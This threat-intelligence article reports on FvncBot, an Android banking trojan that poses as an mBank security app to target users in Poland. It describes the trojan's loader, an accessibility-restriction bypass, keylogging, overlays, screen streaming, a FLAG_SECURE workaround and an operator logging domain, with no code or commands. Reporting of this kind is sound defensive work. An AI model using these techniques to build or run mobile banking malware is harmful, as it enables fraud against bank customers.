FvncBot Mobile Malware

Security analysts have identified a previously unknown Android malware strain, named FvncBot, which is a threat engineered entirely from scratch. Unlike many modern banking trojans that derive their capabilities from leaked codebases, this family follows its own architecture and techniques.

Disguised as a Trusted Polish Banking App

FvncBot spreads under the guise of a legitimate security tool from mBank, aiming squarely at mobile banking users in Poland. The choice of disguise, paired with functionality tailored for financial manipulation, strongly indicates that its operators are focused on highly targeted fraud campaigns.

Custom-Built Features for Financial Fraud

The malware includes an extensive suite of capabilities designed to capture sensitive information and remotely control compromised devices. By abusing Android's accessibility services, it adds keylogging, executes web‑inject attacks, streams screen content, and leverages hidden virtual network computing (HVNC) to facilitate unauthorized banking activity.

FvncBot relies on the apk0day crypting service by Golden Crypt for protection. The malicious app presented to the user functions merely as a loader, deploying the embedded payload.

Bypassing Modern Android Restrictions

Once launched, the dropper attempts to persuade victims to install what appears to be a Google Play component. This process is actually a session-based trick used to bypass accessibility protections on devices running Android 13 and later, a technique seen in other recent campaigns.

During operation, the malware sends log data to a server hosted at naleymilva.it.com, allowing attackers to monitor bot activity in real time. Metadata embedded by the operators, such as the identifier call_pl and the version 1.0‑P, points to Poland as the initial target and suggests that FvncBot is still in an early stage of development.

Establishing Control Through Accessibility Abuse

After deployment, the malware prompts the user to grant accessibility permissions. With elevated privileges secured, it contacts an external server over HTTP to register the device and uses Firebase Cloud Messaging (FCM) to receive ongoing commands.

Core Capabilities

• Below are some of the primary supported functions:
• Initiate or terminate WebSocket sessions for remote control, enabling swipes, taps, and scrolling.
• Forward accessibility logs, installed app lists, and device info to the operators.
• Display or hide full‑screen overlays for data theft.
• Deliver malicious overlays crafted for specific banking applications.
• Validate accessibility status and log keystrokes.
• Retrieve pending instructions from the command server.
• Stream the device's screen using the MediaProjection API.
• Overcoming Screenshot Restrictions With 'Text Mode.'

One notable feature is a specialized 'text mode' that allows attackers to analyze screen content even when apps prevent screenshots through the FLAG_SECURE setting. This enables precise targeting during fraudulent transactions.

Distribution Still Unclear

The current infection method remains unknown. However, Android banking trojans frequently rely on SMS phishing campaigns and unofficial app stores, making those likely vectors for this family as well.

A Growing Threat That May Expand Beyond Poland

Because Android's accessibility service provides deep insight into user activity and the ability to manipulate on‑screen content, it remains a powerful tool for attackers. Although this sample focuses on Polish-speaking users, its operators could easily switch to new regions or impersonate other institutions.